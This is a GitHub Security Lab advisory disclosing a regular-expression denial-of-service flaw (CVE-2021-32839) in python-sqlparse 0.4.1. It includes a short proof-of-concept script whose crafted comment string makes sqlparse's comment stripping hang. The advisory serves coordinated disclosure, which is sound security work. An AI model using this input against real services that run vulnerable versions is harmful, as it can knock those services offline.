skip to content
Back to GitHub.com
Home Bounties Research Advisories Get Involved Events
September 23, 2021

GHSL-2021-107: ReDoS (Regular Expression Denial of Service) in python-sqlparse - CVE-2021-32839

Kevin Backhouse

Coordinated Disclosure Timeline

Summary

python-sqlparse contains a regular expression that is vulnerable to ReDoS (Regular Expression Denial of Service).

Product

python-sqlparse

Tested Version

0.4.1

Details

ReDoS

ReDoS, or Regular Expression Denial of Service, is a vulnerability affecting inefficient regular expressions which can perform extremely badly when run on a crafted input string.

This vulnerability was found using a CodeQL query which identifies inefficient regular expressions. You can see the results of the query on python-sqlparse by following this link.

Vulnerability

The vulnerable regular expression is here.

Please follow these steps to reproduce the issue:

import sqlparse

attack = '\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\t'

sql = 'select * from bar /* ' + attack + '*/'
res = sqlparse.format(sql, strip_comments=True)
print(res)

Impact

This issue may lead to a denial of service.

CVE

Credit

This issue was discovered by GitHub team members @erik-krogh (Erik Krogh Kristensen) and @yoff (Rasmus Petersen).

Contact

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2021-107 in any communication regarding this issue.